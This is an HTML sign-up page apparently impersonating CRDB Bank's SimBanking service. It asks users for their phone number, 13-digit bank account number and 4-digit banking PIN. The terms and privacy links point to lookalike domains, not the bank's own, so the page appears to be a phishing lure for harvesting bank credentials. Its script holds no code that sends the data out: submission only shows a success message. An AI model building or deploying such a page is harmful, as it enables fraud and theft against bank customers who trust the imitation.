<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign Up</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #007749;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }

    .container {
      background-color: white;
      padding: 10%;
      border-radius: 10px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
      width: 300px;
      text-align: center;
    }

    .input-field {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 5px;
      font-size: 16px;
    }

    .input-field:last-of-type {
      position: relative;
    }

    .input-field + .input-field {
      margin-top: 15px;
    }

    .toggle-password {
      position: absolute;
      right: 15px;
      top: 50%;
      transform: translateY(-50%);
      cursor: pointer;
    }

    .signup-btn {
      background-color: white;
      color: black;
      border: 2px solid #ccc;
      padding: 10px;
      margin-top: 15px;
      font-size: 18px;
      border-radius: 5px;
      cursor: pointer;
    }

    .signup-btn:hover {
      background-color: #eee;
    }

    .error {
      color: red;
      font-size: 14px;
      margin-top: 10px;
    }

    .success {
      color: #007749;
      font-size: 14px;
      margin-top: 10px;
    }

    .error-message {
      display: none;
      text-align: left;
      margin-top: -10px;
      margin-bottom: 10px;
    }

    .checkbox-label {
      display: flex;
      align-items: center;
      margin-top: 15px;
      margin-bottom: 15px;
    }

    .checkbox-label input[type="checkbox"] {
      accent-color: #007749; /* Set the color of the checkbox */
      margin-right: 10px;
    }

    .checkbox-label a {
      color: #007749;
      text-decoration: none;
    }

    .checkbox-label a:hover {
      text-decoration: underline;
    }
  </style>
</head>
<body>
  <div class="container">
    <form id="signupForm">
      <input type="text" id="firstName" class="input-field" placeholder="First Name" required>
      <div id="firstNameErrorMessage" class="error-message error"></div>

      <input type="text" id="middleName" class="input-field" placeholder="Middle Name">
      <div id="middleNameErrorMessage" class="error-message error"></div>

      <input type="text" id="lastName" class="input-field" placeholder="Last Name" required>
      <div id="lastNameErrorMessage" class="error-message error"></div>

      <input type="email" id="email" class="input-field" placeholder="Email Address" required>
      <div id="emailErrorMessage" class="error-message error"></div>

      <input type="text" id="phoneNumber" class="input-field" placeholder="Phone Number" required maxlength="10" oninput="validatePhoneNumber(event)" onblur="validatePhoneOnBlur()">
      <div id="phoneErrorMessage" class="error-message error"></div>

      <input type="text" id="accountNumber" class="input-field" placeholder="Account Number" required maxlength="13" oninput="validateAccountNumber(event)" onblur="validateAccountOnBlur()">
      <div id="accountErrorMessage" class="error-message error"></div>

      <div style="position: relative;">
        <input type="password" id="pin" class="input-field" placeholder="Simbanking PIN" required maxlength="4" oninput="validatePIN(event)" onblur="validatePINOnBlur()">
        <span class="toggle-password" onclick="togglePassword()">👁️</span>
      </div>
      <div id="pinErrorMessage" class="error-message error"></div>

      <div class="checkbox-label">
        <input type="checkbox" id="terms" required>
        <label for="terms">
          I agree to the <a href="https://crdbbank-co-tz.webpkgcache.com/doc/-/s/crdbbank.co.tz/storage/app/media/Forms%20and%20Guides/General-Terms-and-Condition.pdf" target="_blank">Terms and Conditions</a> and <a href="https://crdbbank.cd/storage/app/media/Forms%20and%20Guides/CRDB-BANK-PLC-WEBSITE-PRIVACY-POLICY.pdf" target="_blank">Privacy Policy</a>
        </label>
      </div>

      <button type="submit" class="signup-btn">Sign Up</button>
    </form>
    <div id="formErrorMessage" class="error"></div>
    <div id="successMessage" class="success"></div>
  </div>

  <script>
    const form = document.getElementById('signupForm');
    const phoneNumberInput = document.getElementById('phoneNumber');
    const accountNumberInput = document.getElementById('accountNumber');
    const pinInput = document.getElementById('pin');
    const emailInput = document.getElementById('email');
    const firstNameInput = document.getElementById('firstName');
    const middleNameInput = document.getElementById('middleName');
    const lastNameInput = document.getElementById('lastName');
    const phoneErrorMessage = document.getElementById('phoneErrorMessage');
    const accountErrorMessage = document.getElementById('accountErrorMessage');
    const pinErrorMessage = document.getElementById('pinErrorMessage');
    const emailErrorMessage = document.getElementById('emailErrorMessage');
    const firstNameErrorMessage = document.getElementById('firstNameErrorMessage');
    const middleNameErrorMessage = document.getElementById('middleNameErrorMessage');
    const lastNameErrorMessage = document.getElementById('lastNameErrorMessage');
    const formErrorMessage = document.getElementById('formErrorMessage');
    const successMessage = document.getElementById('successMessage');
    const togglePasswordIcon = document.querySelector('.toggle-password');

    let isPhoneValidStart = false;
    let showPassword = false;

    function capitalizeFirstLetter(input) {
      let value = input.value.trim();
      if (value.length > 0) {
        input.value = value.charAt(0).toUpperCase() + value.slice(1);
      }
    }

    function handleFieldFocus(event) {
      const input = event.target;
      if (input.id === 'firstName' || input.id === 'middleName' || input.id === 'lastName') {
        capitalizeFirstLetter(input);
      }
      if (input.id === 'email') {
        validateEmail(event);
      }
    }

    function validatePhoneNumber(event) {
      let phoneNumber = phoneNumberInput.value;

      phoneNumber = phoneNumber.replace(/\D/g, '');

      if (phoneNumber.length === 1) {
        if (phoneNumber.charAt(0) !== '0') {
          phoneErrorMessage.innerText = "Phone number must start with 0.";
          phoneErrorMessage.style.display = "block";
          phoneNumberInput.value = "";
          isPhoneValidStart = false;
        } else {
          phoneErrorMessage.style.display = "none";
        }
      } else if (phoneNumber.length === 2) {
        if (phoneNumber.charAt(1) !== '6' && phoneNumber.charAt(1) !== '7') {
          phoneErrorMessage.innerText = "Second digit must be 6 or 7.";
          phoneErrorMessage.style.display = "block";
          phoneNumberInput.value = "0";
          isPhoneValidStart = false;
        } else {
          phoneErrorMessage.style.display = "none";
          isPhoneValidStart = true;
        }
      } else if (isPhoneValidStart) {
        phoneNumberInput.value = phoneNumber;

        if (phoneNumber.length === 10) {
          accountNumberInput.focus();
        }
      } else {
        phoneNumberInput.value = "";
      }
    }

    function validatePhoneOnBlur() {
      const phoneNumber = phoneNumberInput.value;

      if (isPhoneValidStart && phoneNumber.length !== 10) {
        phoneErrorMessage.innerText = "Phone number must be exactly 10 digits.";
        phoneErrorMessage.style.display = "block";
        phoneNumberInput.focus();
      } else {
        phoneErrorMessage.style.display = "none";
      }
    }

    function validateAccountNumber(event) {
      let accountNumber = accountNumberInput.value;

      accountNumber = accountNumber.replace(/\D/g, '');

      if (accountNumber.length === 13) {
        pinInput.focus();
      }

      accountNumberInput.value = accountNumber;
    }

    function validateAccountOnBlur() {
      const accountNumber = accountNumberInput.value;

      if (accountNumber.length !== 13) {
        accountErrorMessage.innerText = "Account number must be exactly 13 digits.";
        accountErrorMessage.style.display = "block";
        accountNumberInput.focus();
      } else {
        accountErrorMessage.style.display = "none";
      }
    }

    function validatePIN(event) {
      let pin = pinInput.value;

      pin = pin.replace(/\D/g, '');

      pinInput.value = pin;

      if (pin.length === 4) {
        pinInput.focus();
      }
    }

    function validatePINOnBlur() {
      const pin = pinInput.value;

      if (pin.length !== 4) {
        pinErrorMessage.innerText = "PIN must be exactly 4 digits.";
        pinErrorMessage.style.display = "block";
        pinInput.focus();
      } else {
        pinErrorMessage.style.display = "none";
      }
    }

    function validateEmail(event) {
      const email = emailInput.value;
      const regex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

      if (!regex.test(email) || !email.endsWith('@gmail.com')) {
        emailErrorMessage.innerText = "Please enter a valid Gmail address.";
        emailErrorMessage.style.display = "block";
      } else {
        emailErrorMessage.style.display = "none";
      }
    }

    function togglePassword() {
      showPassword = !showPassword;
      pinInput.type = showPassword ? 'text' : 'password';
      togglePasswordIcon.textContent = showPassword ? '❌' : '👁️';
    }

    form.addEventListener('submit', (event) => {
      event.preventDefault();

      const termsCheckbox = document.getElementById('terms');
      if (!termsCheckbox.checked) {
        formErrorMessage.innerText = "You must agree to the terms and conditions and privacy policy.";
        formErrorMessage.style.display = "block";
        return;
      }

      formErrorMessage.style.display = "none";
      successMessage.innerText = "Registration successful!";
    });

    document.querySelectorAll('input').forEach(input => {
      input.addEventListener('focus', handleFieldFocus);
    });
  </script>
</body>
</html>
